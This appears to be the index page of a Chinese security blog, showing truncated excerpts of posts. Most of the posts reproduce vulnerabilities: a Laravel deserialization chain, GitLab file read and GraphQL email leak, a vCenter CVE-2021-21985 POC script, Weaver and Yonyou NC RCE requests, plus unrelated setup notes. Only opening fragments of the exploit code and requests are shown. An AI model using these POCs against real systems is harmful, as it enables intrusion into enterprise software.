前面环境搭建。遇到了一些坑。最终换到Docker 最终还是Docker 真香 docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi mkdir -p /home/data/yapi/mongodata docker run -...
信息安全
Lua调用c模块
一、lua调用c模块总结 1.c函数库成为lua的一个模块 主要做法:将包含c函数的代码生成库文件 linux下是.so windows下是.dll 同时拷贝到lua运行环境的bin下(由...
Laravel 6.x/7.x的一条执行代码的反序列化利用链
这两天碰到了一个Laravel 的环境。死活不行。最后还是奶子哥牛逼。 代码如下: <?php // 影响版本没测试过,本地的6.x和目标7.x都可以 namespace Mockery\Generator{ class M...
密码保护:某OA 任意用户登录
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...
gitlab任意文件读取漏洞 复现
受影响版本 GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab CE >=8.5,<=12.9 首先建立两个项目 test1 and test2 新建完后,再test1 建立一个is...
GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413
GitLab 13.4 - 13.6.2 访问 URL http://xxx.xxx.xxx.xxx/-//graphql-explorer 具体的包 POST /api/graphql HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Lengt...
vCenter Server CVE-2021-21985 POC
import requests import json import sys #python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2 url = sys.argv[1] dns = sys.argv[2] exp = sys.argv[3] header = {'Content...
泛微 WorkflowServiceXml RCE 复现
POC: POST /services%20/WorkflowServiceXml HTTP/1.1 Host: xxx.xxx Content-Type: text/xml;charset=UTF-8 Content-Length: 496 <soapenv:Envel...
用友NC6.5 复现
http://ip:port/servlet/~ic/bsh.servlet.BshServlet 跟泛微那个洞差不多。
IDEA 调试Java 代码 and PhpStorm 调试PHP代码
一、IDEA 调试Java 代码 1.1 新建Java web项目 如果没有Application Server 请添加 点击run 启动项目 启动成...